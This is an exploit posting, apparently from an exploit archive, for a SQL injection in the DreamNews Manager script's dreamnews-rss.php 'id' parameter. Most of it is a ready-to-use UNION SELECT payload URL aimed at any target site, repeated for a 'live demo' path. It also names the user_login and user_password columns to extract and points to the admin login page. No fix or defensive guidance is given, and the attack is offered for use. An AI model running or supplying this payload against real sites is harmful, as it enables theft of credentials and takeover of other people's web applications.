#########################################################
#
# dreamnews ( rss) Remote SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
#=========================================================
#
# script : /dreamnews.php
#
# DorK : N/A
#
##########################################################
Exploit:
www.[target].com/Script/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
L!VE DEMO:
/demo/dreamnews/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
column_name :
user_password
user_login
Admin Login :
/admin/
########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# #
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################
Im IRAQi
【DreamNews Manager (id) Remote SQL Injection Vulnerability】相关文章:
★ phpDatingClub (website.php page) Local File Inclusion Vulnerability
★ AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
★ MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
★ File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities
★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)
★ IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit